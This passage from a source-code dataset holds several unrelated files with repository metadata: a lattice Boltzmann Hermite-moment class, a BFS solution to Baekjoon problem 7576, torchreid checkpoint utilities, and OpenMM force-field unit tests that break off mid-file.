'J_xxy', 'J_xxz', 'J_xyy', 'J_xyz', 'J_xzz', 'J_yyz', 'J_yzz',
'J_xxyy', 'J_xxyz', 'J_xxzz', 'J_xyyz', 'J_xyzz', 'J_yyzz',
'J_xxyyz', 'J_xxyzz', 'J_xyyzz', 'J_xyxzyz']
supported_stencils = [D3Q27]
def __init__(self, lattice):
super(D3Q27Hermite, self).__init__(
lattice, self.names
)
self.matrix = self.lattice.convert_to_tensor(self.matrix)
self.inverse = self.lattice.convert_to_tensor(self.inverse)
def transform(self, f):
return self.lattice.mv(self.matrix, f)
def inverse_transform(self, m):
return self.lattice.mv(self.inverse, m)
def equilibrium(self, m):
meq = torch.zeros_like(m)
rho = m[0]
jx = m[1]
jy = m[2]
jz = m[3]
meq[0] = rho
meq[1] = jx
meq[2] = jy
meq[3] = jz
meq[4] = jx * jx / rho
meq[5] = jx * jy / rho
meq[6] = jx * jz / rho
meq[7] = jy * jy / rho
meq[8] = jy * jz / rho
meq[9] = jz * jz / rho
meq[10] = jx * jx * jy / rho ** 2
meq[11] = jx * jx * jz / rho ** 2
meq[12] = jx * jy * jy / rho ** 2
meq[13] = jx * jy * jz / rho ** 2
meq[14] = jx * jz * jz / rho ** 2
meq[15] = jy * jy * jz / rho ** 2
meq[16] = jy * jz * jz / rho ** 2
meq[17] = jx * jx * jy * jy / rho ** 3
meq[18] = jx * jx * jy * jz / rho ** 3
meq[19] = jx * jx * jz * jz / rho ** 3
meq[20] = jx * jy * jy * jz / rho ** 3
meq[21] = jx * jy * jz * jz / rho ** 3
meq[22] = jy * jy * jz * jz / rho ** 3
meq[23] = jx * jx * jy * jy * jz / rho ** 4
meq[24] = jx * jx * jy * jz * jz / rho ** 4
meq[25] = jx * jy * jy * jz * jz / rho ** 4
meq[26] = jx * jy * jx * jz * jy * jz / rho ** 5
return meq
|
ead31affaf18b24f0016272388abef419c8f50c0
|
307d3837d31f9e3728af2b62ca51ebf63fe6ec6b
|
/hall_of_fame/lysuk96/DFS_BFS/BOJ_7576.py
|
b858dd8a152cdaeca052087962a1a1ff50ab1ced
|
[] |
no_license
|
ellynhan/challenge100-codingtest-study
|
905043497d154b8a7333ca536e536d013f6e7454
|
bcdc6d04f13b12ba80b42e066f9d244d7c2cc698
|
refs/heads/master
| 2023-09-01T14:10:13.481013
| 2023-08-27T14:38:52
| 2023-08-27T14:38:52
| 401,561,230
| 162
| 176
| null | 2023-09-09T14:56:25
| 2021-08-31T03:30:36
|
C++
|
UTF-8
|
Python
| false
| false
| 1,315
|
py
|
BOJ_7576.py
|
# Tomato (BOJ 7576)
# print count: after one full pass over len(queue), i.e. per BFS level
from collections import deque
def solution(m, n, tomatoes):
def search(r, c):
D = [(0,1), (0,-1), (1,0), (-1,0)]
result = []
for i, j in D:
if (r+i>=0 and r+i<n)\
and (c+j>=0 and c+j<m)\
and (tomatoes[r+i][c+j] == 0):
result.append((r+i, c+j))
return result
#initialize
queue = deque([])
count = 0
for r in range(n):
for c in range(m):
if tomatoes[r][c] == 1:
queue.append((r,c))
while queue:
# print(queue)
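        # one pass over the current queue contents ripens one day's worth of tomatoes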
for _ in range(len(queue)):
tomato = queue.popleft()
for i, j in search(tomato[0],tomato[1]):
tomatoes[i][j] = 1
queue.append((i,j))
# print(tomatoes)
count+=1
    # print the result
for r in range(n):
for c in range(m):
if tomatoes[r][c] == 0:
print('-1')
return
print(count-1)
return
M, N = map(int, input().split())
# tomatoes = []
# for r in range(M):
# for c in range(N):
# tomatoes[r][c] = int(input())
tomatoes = [[n for n in map(int,input().split())] for _ in range(N)]
# print(tomatoes)
solution(M, N, tomatoes)
|
707b07216a428a5957d2a20fabec775b093de7a0
|
18ad3a6818cd9d8243e2fe41d65bc76530e6dbae
|
/torchreid/utils/torchtools.py
|
e854278d90106e64c0f0822b2fa699da05221f7c
|
[
"MIT"
] |
permissive
|
KaiyangZhou/deep-person-reid
|
55fe2fa0306847c5447d1c70fecd1f585758ae5e
|
566a56a2cb255f59ba75aa817032621784df546a
|
refs/heads/master
| 2023-09-02T21:55:37.749729
| 2023-02-08T02:52:17
| 2023-02-08T02:52:17
| 124,800,162
| 4,191
| 1,167
|
MIT
| 2023-05-23T11:41:21
| 2018-03-11T21:14:39
|
Python
|
UTF-8
|
Python
| false
| false
| 9,672
|
py
|
torchtools.py
|
from __future__ import division, print_function, absolute_import
import pickle
import shutil
import os.path as osp
import warnings
from functools import partial
from collections import OrderedDict
import torch
import torch.nn as nn
from .tools import mkdir_if_missing
__all__ = [
'save_checkpoint', 'load_checkpoint', 'resume_from_checkpoint',
'open_all_layers', 'open_specified_layers', 'count_num_param',
'load_pretrained_weights'
]
def save_checkpoint(
state, save_dir, is_best=False, remove_module_from_keys=False
):
r"""Saves checkpoint.
Args:
state (dict): dictionary.
save_dir (str): directory to save checkpoint.
is_best (bool, optional): if True, this checkpoint will be copied and named
``model-best.pth.tar``. Default is False.
remove_module_from_keys (bool, optional): whether to remove "module."
from layer names. Default is False.
Examples::
>>> state = {
>>> 'state_dict': model.state_dict(),
>>> 'epoch': 10,
>>> 'rank1': 0.5,
>>> 'optimizer': optimizer.state_dict()
>>> }
>>> save_checkpoint(state, 'log/my_model')
"""
mkdir_if_missing(save_dir)
if remove_module_from_keys:
# remove 'module.' in state_dict's keys
state_dict = state['state_dict']
new_state_dict = OrderedDict()
for k, v in state_dict.items():
if k.startswith('module.'):
k = k[7:]
new_state_dict[k] = v
state['state_dict'] = new_state_dict
# save
epoch = state['epoch']
fpath = osp.join(save_dir, 'model.pth.tar-' + str(epoch))
torch.save(state, fpath)
print('Checkpoint saved to "{}"'.format(fpath))
if is_best:
shutil.copy(fpath, osp.join(osp.dirname(fpath), 'model-best.pth.tar'))
def load_checkpoint(fpath):
r"""Loads checkpoint.
    ``UnicodeDecodeError`` is handled gracefully, which means
    python2-saved files can be read in python3.
Args:
fpath (str): path to checkpoint.
Returns:
dict
Examples::
>>> from torchreid.utils import load_checkpoint
>>> fpath = 'log/my_model/model.pth.tar-10'
>>> checkpoint = load_checkpoint(fpath)
"""
if fpath is None:
raise ValueError('File path is None')
fpath = osp.abspath(osp.expanduser(fpath))
if not osp.exists(fpath):
raise FileNotFoundError('File is not found at "{}"'.format(fpath))
map_location = None if torch.cuda.is_available() else 'cpu'
try:
checkpoint = torch.load(fpath, map_location=map_location)
except UnicodeDecodeError:
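        # checkpoint was pickled by python2; decode its byte strings as latin1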
pickle.load = partial(pickle.load, encoding="latin1")
pickle.Unpickler = partial(pickle.Unpickler, encoding="latin1")
checkpoint = torch.load(
fpath, pickle_module=pickle, map_location=map_location
)
except Exception:
print('Unable to load checkpoint from "{}"'.format(fpath))
raise
return checkpoint
def resume_from_checkpoint(fpath, model, optimizer=None, scheduler=None):
r"""Resumes training from a checkpoint.
This will load (1) model weights and (2) ``state_dict``
of optimizer if ``optimizer`` is not None.
Args:
fpath (str): path to checkpoint.
model (nn.Module): model.
optimizer (Optimizer, optional): an Optimizer.
scheduler (LRScheduler, optional): an LRScheduler.
Returns:
int: start_epoch.
Examples::
>>> from torchreid.utils import resume_from_checkpoint
>>> fpath = 'log/my_model/model.pth.tar-10'
>>> start_epoch = resume_from_checkpoint(
>>> fpath, model, optimizer, scheduler
>>> )
"""
print('Loading checkpoint from "{}"'.format(fpath))
checkpoint = load_checkpoint(fpath)
model.load_state_dict(checkpoint['state_dict'])
print('Loaded model weights')
if optimizer is not None and 'optimizer' in checkpoint.keys():
optimizer.load_state_dict(checkpoint['optimizer'])
print('Loaded optimizer')
if scheduler is not None and 'scheduler' in checkpoint.keys():
scheduler.load_state_dict(checkpoint['scheduler'])
print('Loaded scheduler')
start_epoch = checkpoint['epoch']
print('Last epoch = {}'.format(start_epoch))
if 'rank1' in checkpoint.keys():
print('Last rank1 = {:.1%}'.format(checkpoint['rank1']))
return start_epoch
def adjust_learning_rate(
optimizer,
base_lr,
epoch,
stepsize=20,
gamma=0.1,
linear_decay=False,
final_lr=0,
max_epoch=100
):
r"""Adjusts learning rate.
Deprecated.
"""
if linear_decay:
# linearly decay learning rate from base_lr to final_lr
frac_done = epoch / max_epoch
lr = frac_done*final_lr + (1.-frac_done) * base_lr
else:
# decay learning rate by gamma for every stepsize
lr = base_lr * (gamma**(epoch // stepsize))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def set_bn_to_eval(m):
r"""Sets BatchNorm layers to eval mode."""
# 1. no update for running mean and var
# 2. scale and shift parameters are still trainable
classname = m.__class__.__name__
if classname.find('BatchNorm') != -1:
m.eval()
def open_all_layers(model):
r"""Opens all layers in model for training.
Examples::
>>> from torchreid.utils import open_all_layers
>>> open_all_layers(model)
"""
model.train()
for p in model.parameters():
p.requires_grad = True
def open_specified_layers(model, open_layers):
r"""Opens specified layers in model for training while keeping
other layers frozen.
Args:
model (nn.Module): neural net model.
open_layers (str or list): layers open for training.
Examples::
>>> from torchreid.utils import open_specified_layers
>>> # Only model.classifier will be updated.
>>> open_layers = 'classifier'
>>> open_specified_layers(model, open_layers)
>>> # Only model.fc and model.classifier will be updated.
>>> open_layers = ['fc', 'classifier']
>>> open_specified_layers(model, open_layers)
"""
if isinstance(model, nn.DataParallel):
model = model.module
if isinstance(open_layers, str):
open_layers = [open_layers]
for layer in open_layers:
assert hasattr(
model, layer
), '"{}" is not an attribute of the model, please provide the correct name'.format(
layer
)
for name, module in model.named_children():
if name in open_layers:
module.train()
for p in module.parameters():
p.requires_grad = True
else:
module.eval()
for p in module.parameters():
p.requires_grad = False
def count_num_param(model):
r"""Counts number of parameters in a model while ignoring ``self.classifier``.
Args:
model (nn.Module): network model.
Examples::
>>> from torchreid.utils import count_num_param
>>> model_size = count_num_param(model)
.. warning::
This method is deprecated in favor of
``torchreid.utils.compute_model_complexity``.
"""
warnings.warn(
'This method is deprecated and will be removed in the future.'
)
num_param = sum(p.numel() for p in model.parameters())
if isinstance(model, nn.DataParallel):
model = model.module
if hasattr(model,
'classifier') and isinstance(model.classifier, nn.Module):
# we ignore the classifier because it is unused at test time
num_param -= sum(p.numel() for p in model.classifier.parameters())
return num_param
def load_pretrained_weights(model, weight_path):
r"""Loads pretrianed weights to model.
Features::
- Incompatible layers (unmatched in name or size) will be ignored.
- Can automatically deal with keys containing "module.".
Args:
model (nn.Module): network model.
weight_path (str): path to pretrained weights.
Examples::
>>> from torchreid.utils import load_pretrained_weights
>>> weight_path = 'log/my_model/model-best.pth.tar'
>>> load_pretrained_weights(model, weight_path)
"""
checkpoint = load_checkpoint(weight_path)
if 'state_dict' in checkpoint:
state_dict = checkpoint['state_dict']
else:
state_dict = checkpoint
model_dict = model.state_dict()
new_state_dict = OrderedDict()
matched_layers, discarded_layers = [], []
for k, v in state_dict.items():
if k.startswith('module.'):
k = k[7:] # discard module.
if k in model_dict and model_dict[k].size() == v.size():
new_state_dict[k] = v
matched_layers.append(k)
else:
discarded_layers.append(k)
model_dict.update(new_state_dict)
model.load_state_dict(model_dict)
if len(matched_layers) == 0:
warnings.warn(
'The pretrained weights "{}" cannot be loaded, '
'please check the key names manually '
'(** ignored and continue **)'.format(weight_path)
)
else:
print(
'Successfully loaded pretrained weights from "{}"'.
format(weight_path)
)
if len(discarded_layers) > 0:
print(
'** The following layers are discarded '
'due to unmatched keys or layer size: {}'.
format(discarded_layers)
)
| 82723093b606011e8cfc3c82e028136cda437c99 | 3a6a211ea0d32405497fbd6486c490bb147e25f9 | /dashboard/dashboard/models/__init__.py | 64d74087cb12ebb5a4ceb9a2d564bae931868a4f | ["BSD-3-Clause"] | permissive | catapult-project/catapult | e2cbdd5eb89f3b1492fc8752494e62ea1df4bae0 | 53102de187a48ac2cfc241fef54dcbc29c453a8e | refs/heads/main | 2021-05-25T07:37:22.832505 | 2021-05-24T08:01:49 | 2021-05-25T06:07:38 | 33,947,548 | 2,032 | 742 | BSD-3-Clause | 2022-08-26T16:01:18 | 2015-04-14T17:49:05 | HTML | UTF-8 | Python | false | false | 341 | py | __init__.py |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""The models sub-package, which contains datastore model classes."""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
| 4839bf1a05887f8a1db746696637535d8d88936d | add160f872dccc7f326dc00196fd418c748a89b1 | /wrappers/python/tests/TestForceField.py | 767c7793d642248cfe50f2385452cdb4a3ed1c1e | [] | no_license | openmm/openmm | 22f3d6ae2747f54acfaa92a5a6a5869049019dee | d2593f386a627d069b5ec17a3a2f4ecd40d85dd1 | refs/heads/master | 2023-08-22T18:29:54.807240 | 2023-08-18T19:09:05 | 2023-08-18T19:09:05 | 10,178,188 | 875 | 324 | null | 2023-09-12T23:40:17 | 2013-05-20T17:42:52 | C++ | UTF-8 | Python | false | false | 69,170 | py | TestForceField.py |
import unittest
from validateConstraints import *
from openmm.app import *
from openmm import *
from openmm.unit import *
import openmm.app.element as elem
import openmm.app.forcefield as forcefield
import math
import textwrap
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
import os
import warnings
class TestForceField(unittest.TestCase):
"""Test the ForceField.createSystem() method."""
def setUp(self):
"""Set up the tests by loading the input pdb files and force field
xml files.
"""
# alanine dipeptide with explicit water
self.pdb1 = PDBFile('systems/alanine-dipeptide-explicit.pdb')
self.forcefield1 = ForceField('amber99sb.xml', 'tip3p.xml')
self.topology1 = self.pdb1.topology
self.topology1.setUnitCellDimensions(Vec3(2, 2, 2))
# alanine dipeptide with implicit water
self.pdb2 = PDBFile('systems/alanine-dipeptide-implicit.pdb')
self.forcefield2 = ForceField('amber99sb.xml', 'amber99_obc.xml')
def test_NonbondedMethod(self):
"""Test all six options for the nonbondedMethod parameter."""
methodMap = {NoCutoff:NonbondedForce.NoCutoff,
CutoffNonPeriodic:NonbondedForce.CutoffNonPeriodic,
CutoffPeriodic:NonbondedForce.CutoffPeriodic,
Ewald:NonbondedForce.Ewald,
PME:NonbondedForce.PME,
LJPME:NonbondedForce.LJPME}
for method in methodMap:
system = self.forcefield1.createSystem(self.pdb1.topology,
nonbondedMethod=method)
forces = system.getForces()
self.assertTrue(any(isinstance(f, NonbondedForce) and
f.getNonbondedMethod()==methodMap[method]
for f in forces))
def test_DispersionCorrection(self):
"""Test to make sure that the dispersion/long-range correction is set properly."""
top = Topology()
chain = top.addChain()
for lrc in (True, False):
xml = textwrap.dedent(
"""
<ForceField>
<LennardJonesForce lj14scale="0.3" useDispersionCorrection="{lrc}">
<Atom type="A" sigma="1" epsilon="0.1"/>
<Atom type="B" sigma="2" epsilon="0.2"/>
<NBFixPair type1="A" type2="B" sigma="2.5" epsilon="1.1"/>
</LennardJonesForce>
<NonbondedForce coulomb14scale="0.833333" lj14scale="0.5" useDispersionCorrection="{lrc2}">
<Atom type="A" sigma="0.315" epsilon="0.635"/>
</NonbondedForce>
</ForceField>
"""
)
ff = ForceField(StringIO(xml.format(lrc=lrc, lrc2=lrc)))
system = ff.createSystem(top)
checked_nonbonded = False
checked_custom = False
for force in system.getForces():
if isinstance(force, NonbondedForce):
self.assertEqual(force.getUseDispersionCorrection(), lrc)
checked_nonbonded = True
elif isinstance(force, CustomNonbondedForce):
self.assertEqual(force.getUseLongRangeCorrection(), lrc)
checked_custom = True
self.assertTrue(checked_nonbonded and checked_custom)
# check that the keyword argument overwrites xml input
lrc_kwarg = not lrc
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
system2 = ff.createSystem(top, useDispersionCorrection=lrc_kwarg)
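            # Two warnings are expected here, presumably one conflict warning
            # from each generator that honors the keyword (LennardJonesForce
            # and NonbondedForce).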
self.assertTrue(len(w) == 2)
assert "conflict" in str(w[-1].message).lower()
checked_nonbonded = False
checked_custom = False
for force in system2.getForces():
if isinstance(force, NonbondedForce):
self.assertEqual(force.getUseDispersionCorrection(), lrc_kwarg)
checked_nonbonded = True
elif isinstance(force, CustomNonbondedForce):
self.assertEqual(force.getUseLongRangeCorrection(), lrc_kwarg)
checked_custom = True
self.assertTrue(checked_nonbonded and checked_custom)
# check that no warning is generated when useDispersionCorrection is not in the xml file
xml = textwrap.dedent(
"""
<ForceField>
<LennardJonesForce lj14scale="0.3">
<Atom type="A" sigma="1" epsilon="0.1"/>
<Atom type="B" sigma="2" epsilon="0.2"/>
<NBFixPair type1="A" type2="B" sigma="2.5" epsilon="1.1"/>
</LennardJonesForce>
<NonbondedForce coulomb14scale="0.833333" lj14scale="0.5">
<Atom type="A" sigma="0.315" epsilon="0.635"/>
</NonbondedForce>
</ForceField>
"""
)
ff = ForceField(StringIO(xml))
system = ff.createSystem(top)
for lrc_kwarg in [True, False]:
with warnings.catch_warnings():
warnings.simplefilter("error")
system2 = ff.createSystem(top, useDispersionCorrection=lrc_kwarg)
def test_Cutoff(self):
"""Test to make sure the nonbondedCutoff parameter is passed correctly."""
for method in [CutoffNonPeriodic, CutoffPeriodic, Ewald, PME, LJPME]:
system = self.forcefield1.createSystem(self.pdb1.topology,
nonbondedMethod=method,
nonbondedCutoff=2*nanometer,
constraints=HBonds)
cutoff_distance = 0.0*nanometer
cutoff_check = 2.0*nanometer
for force in system.getForces():
if isinstance(force, NonbondedForce):
cutoff_distance = force.getCutoffDistance()
self.assertEqual(cutoff_distance, cutoff_check)
def test_SwitchingDistance(self):
"""Test that the switchDistance parameter is processed correctly."""
for switchDistance in [None, 0.9*nanometers]:
system = self.forcefield1.createSystem(self.pdb1.topology,
nonbondedMethod=PME,
switchDistance=switchDistance)
for force in system.getForces():
if isinstance(force, NonbondedForce):
if switchDistance is None:
self.assertFalse(force.getUseSwitchingFunction())
else:
self.assertTrue(force.getUseSwitchingFunction())
self.assertEqual(switchDistance, force.getSwitchingDistance())
def test_RemoveCMMotion(self):
"""Test both options (True and False) for the removeCMMotion parameter."""
for b in [True, False]:
system = self.forcefield1.createSystem(self.pdb1.topology,removeCMMotion=b)
forces = system.getForces()
self.assertEqual(any(isinstance(f, CMMotionRemover) for f in forces), b)
def test_RigidWaterAndConstraints(self):
"""Test all eight options for the constraints and rigidWater parameters."""
topology = self.pdb1.topology
for constraints_value in [None, HBonds, AllBonds, HAngles]:
for rigidWater_value in [True, False, None]:
system = self.forcefield1.createSystem(topology,
constraints=constraints_value,
rigidWater=rigidWater_value)
validateConstraints(self, topology, system,
                                    constraints_value, rigidWater_value is not False)
def test_flexibleConstraints(self):
""" Test the flexibleConstraints keyword """
topology = self.pdb1.topology
system1 = self.forcefield1.createSystem(topology, constraints=HAngles,
rigidWater=True)
system2 = self.forcefield1.createSystem(topology, constraints=HAngles,
rigidWater=True, flexibleConstraints=True)
system3 = self.forcefield1.createSystem(topology, constraints=None, rigidWater=False)
validateConstraints(self, topology, system1, HAngles, True)
# validateConstraints fails for system2 since by definition atom pairs can be in both bond
# and constraint lists. So just check that the number of constraints is the same for both
# system1 and system2
self.assertEqual(system1.getNumConstraints(), system2.getNumConstraints())
for force in system1.getForces():
if isinstance(force, HarmonicBondForce):
bf1 = force
elif isinstance(force, HarmonicAngleForce):
af1 = force
for force in system2.getForces():
if isinstance(force, HarmonicBondForce):
bf2 = force
elif isinstance(force, HarmonicAngleForce):
af2 = force
for force in system3.getForces():
if isinstance(force, HarmonicAngleForce):
af3 = force
# Make sure we picked up extra bond terms with flexibleConstraints
self.assertGreater(bf2.getNumBonds(), bf1.getNumBonds())
# Make sure flexibleConstraints yields just as many angles as no constraints
self.assertEqual(af2.getNumAngles(), af3.getNumAngles())
def test_ImplicitSolvent(self):
"""Test the four types of implicit solvents using the implicitSolvent
parameter.
"""
topology = self.pdb2.topology
system = self.forcefield2.createSystem(topology)
forces = system.getForces()
self.assertTrue(any(isinstance(f, GBSAOBCForce) for f in forces))
def test_ImplicitSolventParameters(self):
"""Test that solventDielectric and soluteDielectric are passed correctly
for the different types of implicit solvent.
"""
topology = self.pdb2.topology
system = self.forcefield2.createSystem(topology, solventDielectric=50.0,
soluteDielectric=0.9)
found_matching_solvent_dielectric=False
found_matching_solute_dielectric=False
for force in system.getForces():
if isinstance(force, GBSAOBCForce):
if force.getSolventDielectric() == 50.0:
found_matching_solvent_dielectric = True
if force.getSoluteDielectric() == 0.9:
found_matching_solute_dielectric = True
if isinstance(force, NonbondedForce):
self.assertEqual(force.getReactionFieldDielectric(), 1.0)
self.assertTrue(found_matching_solvent_dielectric and
found_matching_solute_dielectric)
def test_HydrogenMass(self):
"""Test that altering the mass of hydrogens works correctly."""
topology = self.pdb1.topology
hydrogenMass = 4*amu
system1 = self.forcefield1.createSystem(topology)
system2 = self.forcefield1.createSystem(topology, hydrogenMass=hydrogenMass)
for atom in topology.atoms():
if atom.element == elem.hydrogen:
self.assertNotEqual(hydrogenMass, system1.getParticleMass(atom.index))
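                # Hydrogen mass repartitioning is assumed to skip water, so
                # water hydrogens should keep their original mass in both systems.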
if atom.residue.name == 'HOH':
self.assertEqual(system1.getParticleMass(atom.index), system2.getParticleMass(atom.index))
else:
self.assertEqual(hydrogenMass, system2.getParticleMass(atom.index))
totalMass1 = sum([system1.getParticleMass(i) for i in range(system1.getNumParticles())]).value_in_unit(amu)
totalMass2 = sum([system2.getParticleMass(i) for i in range(system2.getNumParticles())]).value_in_unit(amu)
self.assertAlmostEqual(totalMass1, totalMass2)
def test_DrudeMass(self):
"""Test that setting the mass of Drude particles works correctly."""
forcefield = ForceField('charmm_polar_2013.xml')
pdb = PDBFile('systems/ala_ala_ala.pdb')
modeller = Modeller(pdb.topology, pdb.positions)
modeller.addExtraParticles(forcefield)
system = forcefield.createSystem(modeller.topology, drudeMass=0)
trueMass = [system.getParticleMass(i) for i in range(system.getNumParticles())]
drudeMass = 0.3*amu
system = forcefield.createSystem(modeller.topology, drudeMass=drudeMass)
adjustedMass = [system.getParticleMass(i) for i in range(system.getNumParticles())]
drudeForce = [f for f in system.getForces() if isinstance(f, DrudeForce)][0]
drudeParticles = set()
parentParticles = set()
for i in range(drudeForce.getNumParticles()):
params = drudeForce.getParticleParameters(i)
drudeParticles.add(params[0])
parentParticles.add(params[1])
for i in range(system.getNumParticles()):
if i in drudeParticles:
self.assertEqual(0*amu, trueMass[i])
self.assertEqual(drudeMass, adjustedMass[i])
elif i in parentParticles:
self.assertEqual(trueMass[i]-drudeMass, adjustedMass[i])
else:
self.assertEqual(trueMass[i], adjustedMass[i])
def test_UnusedArgs(self):
"""Test that specifying an argument that is never used throws an exception."""
topology = self.pdb1.topology
# Using the default value should not raise an exception.
self.forcefield1.createSystem(topology, drudeMass=0.4*amu)
# Specifying a non-default value should.
with self.assertRaises(ValueError):
self.forcefield1.createSystem(topology, drudeMass=0.5*amu)
        # Specifying a nonexistent argument should raise an exception.
with self.assertRaises(ValueError):
self.forcefield1.createSystem(topology, nonbndedCutoff=1.0*nanometer)
def test_Forces(self):
"""Compute forces and compare them to ones generated with a previous version of OpenMM to ensure they haven't changed."""
pdb = PDBFile('systems/lysozyme-implicit.pdb')
system = self.forcefield2.createSystem(pdb.topology)
integrator = VerletIntegrator(0.001)
context = Context(system, integrator)
context.setPositions(pdb.positions)
state1 = context.getState(getForces=True)
with open('systems/lysozyme-implicit-forces.xml') as input:
state2 = XmlSerializer.deserialize(input.read())
numDifferences = 0
        for f1, f2 in zip(state1.getForces().value_in_unit(kilojoules_per_mole/nanometer), state2.getForces().value_in_unit(kilojoules_per_mole/nanometer)):
diff = norm(f1-f2)
if diff > 0.1 and diff/norm(f1) > 1e-3:
numDifferences += 1
self.assertTrue(numDifferences < system.getNumParticles()/20) # Tolerate occasional differences from numerical error
def test_ImplicitSolventForces(self):
"""Compute forces for different implicit solvent types, and compare them to ones generated with AmberPrmtopFile."""
solventType = ['hct', 'obc1', 'obc2', 'gbn', 'gbn2']
nonbondedMethod = [NoCutoff, CutoffNonPeriodic, CutoffNonPeriodic, NoCutoff, NoCutoff]
kappa = [0.0, 0.0, 1.698295227342757, 1.698295227342757, 0.0]
file = [None, 'OBC1_NonPeriodic', 'OBC2_NonPeriodic_Salt', None, 'GBn2_NoCutoff']
for i in range(len(file)):
forcefield = ForceField('amber96.xml', f'implicit/{solventType[i]}.xml')
system = forcefield.createSystem(self.pdb2.topology, nonbondedMethod=nonbondedMethod[i], implicitSolventKappa=kappa[i])
integrator = VerletIntegrator(0.001)
context = Context(system, integrator, Platform.getPlatformByName("Reference"))
context.setPositions(self.pdb2.positions)
state1 = context.getState(getForces=True)
if file[i] is not None:
with open('systems/alanine-dipeptide-implicit-forces/'+file[i]+'.xml') as infile:
state2 = XmlSerializer.deserialize(infile.read())
                for f1, f2 in zip(state1.getForces().value_in_unit(kilojoules_per_mole/nanometer), state2.getForces().value_in_unit(kilojoules_per_mole/nanometer)):
diff = norm(f1-f2)
self.assertTrue(diff < 0.1 or diff/norm(f1) < 1e-4)
def test_ProgrammaticForceField(self):
"""Test building a ForceField programmatically."""
# Build the ForceField for TIP3P programmatically.
ff = ForceField()
ff.registerAtomType({'name':'tip3p-O', 'class':'OW', 'mass':15.99943*daltons, 'element':elem.oxygen})
ff.registerAtomType({'name':'tip3p-H', 'class':'HW', 'mass':1.007947*daltons, 'element':elem.hydrogen})
residue = ForceField._TemplateData('HOH')
residue.atoms.append(ForceField._TemplateAtomData('O', 'tip3p-O', elem.oxygen))
residue.atoms.append(ForceField._TemplateAtomData('H1', 'tip3p-H', elem.hydrogen))
residue.atoms.append(ForceField._TemplateAtomData('H2', 'tip3p-H', elem.hydrogen))
residue.addBond(0, 1)
residue.addBond(0, 2)
ff.registerResidueTemplate(residue)
bonds = forcefield.HarmonicBondGenerator(ff)
bonds.registerBond({'class1':'OW', 'class2':'HW', 'length':0.09572*nanometers, 'k':462750.4*kilojoules_per_mole/nanometer})
ff.registerGenerator(bonds)
angles = forcefield.HarmonicAngleGenerator(ff)
angles.registerAngle({'class1':'HW', 'class2':'OW', 'class3':'HW', 'angle':1.82421813418*radians, 'k':836.8*kilojoules_per_mole/radian})
ff.registerGenerator(angles)
nonbonded = forcefield.NonbondedGenerator(ff, 0.833333, 0.5, True)
nonbonded.registerAtom({'type':'tip3p-O', 'charge':-0.834, 'sigma':0.31507524065751241*nanometers, 'epsilon':0.635968*kilojoules_per_mole})
nonbonded.registerAtom({'type':'tip3p-H', 'charge':0.417, 'sigma':1*nanometers, 'epsilon':0*kilojoules_per_mole})
ff.registerGenerator(nonbonded)
# Build a water box.
modeller = Modeller(Topology(), [])
modeller.addSolvent(ff, boxSize=Vec3(3, 3, 3)*nanometers)
# Create a system using the programmatic force field as well as one from an XML file.
system1 = ff.createSystem(modeller.topology)
ff2 = ForceField('tip3p.xml')
system2 = ff2.createSystem(modeller.topology)
self.assertEqual(XmlSerializer.serialize(system1), XmlSerializer.serialize(system2))
def test_PeriodicBoxVectors(self):
"""Test setting the periodic box vectors."""
vectors = (Vec3(5, 0, 0), Vec3(-1.5, 4.5, 0), Vec3(0.4, 0.8, 7.5))*nanometers
self.pdb1.topology.setPeriodicBoxVectors(vectors)
self.assertEqual(Vec3(5, 4.5, 7.5)*nanometers, self.pdb1.topology.getUnitCellDimensions())
system = self.forcefield1.createSystem(self.pdb1.topology)
for i in range(3):
self.assertEqual(vectors[i], self.pdb1.topology.getPeriodicBoxVectors()[i])
self.assertEqual(vectors[i], system.getDefaultPeriodicBoxVectors()[i])
def test_ResidueAttributes(self):
"""Test a ForceField that gets per-particle parameters from residue attributes."""
xml = """
<ForceField>
<AtomTypes>
<Type name="tip3p-O" class="OW" element="O" mass="15.99943"/>
<Type name="tip3p-H" class="HW" element="H" mass="1.007947"/>
</AtomTypes>
<Residues>
<Residue name="HOH">
<Atom name="O" type="tip3p-O" charge="-0.834"/>
<Atom name="H1" type="tip3p-H" charge="0.417"/>
<Atom name="H2" type="tip3p-H" charge="0.417"/>
<Bond from="0" to="1"/>
<Bond from="0" to="2"/>
</Residue>
</Residues>
<NonbondedForce coulomb14scale="0.833333" lj14scale="0.5">
<UseAttributeFromResidue name="charge"/>
<Atom type="tip3p-O" sigma="0.315" epsilon="0.635"/>
<Atom type="tip3p-H" sigma="1" epsilon="0"/>
</NonbondedForce>
</ForceField>"""
ff = ForceField(StringIO(xml))
# Build a water box.
modeller = Modeller(Topology(), [])
modeller.addSolvent(ff, boxSize=Vec3(3, 3, 3)*nanometers)
# Create a system and make sure all nonbonded parameters are correct.
system = ff.createSystem(modeller.topology)
nonbonded = [f for f in system.getForces() if isinstance(f, NonbondedForce)][0]
atoms = list(modeller.topology.atoms())
for i in range(len(atoms)):
params = nonbonded.getParticleParameters(i)
if atoms[i].element == elem.oxygen:
self.assertEqual(params[0], -0.834*elementary_charge)
self.assertEqual(params[1], 0.315*nanometers)
self.assertEqual(params[2], 0.635*kilojoule_per_mole)
else:
self.assertEqual(params[0], 0.417*elementary_charge)
self.assertEqual(params[1], 1.0*nanometers)
self.assertEqual(params[2], 0.0*kilojoule_per_mole)
def test_residueMatcher(self):
"""Test using a custom template matcher to select templates."""
xml = """
<ForceField>
<AtomTypes>
<Type name="tip3p-O" class="OW" element="O" mass="15.99943"/>
<Type name="tip3p-H" class="HW" element="H" mass="1.007947"/>
</AtomTypes>
<Residues>
<Residue name="HOH">
<Atom name="O" type="tip3p-O" charge="-0.834"/>
<Atom name="H1" type="tip3p-H" charge="0.417"/>
<Atom name="H2" type="tip3p-H" charge="0.417"/>
<Bond from="0" to="1"/>
<Bond from="0" to="2"/>
<Bond from="1" to="2"/>
</Residue>
<Residue name="HOH2">
<Atom name="O" type="tip3p-O" charge="0.834"/>
<Atom name="H1" type="tip3p-H" charge="-0.417"/>
<Atom name="H2" type="tip3p-H" charge="-0.417"/>
<Bond from="0" to="1"/>
<Bond from="0" to="2"/>
<Bond from="1" to="2"/>
</Residue>
</Residues>
<NonbondedForce coulomb14scale="0.833333" lj14scale="0.5">
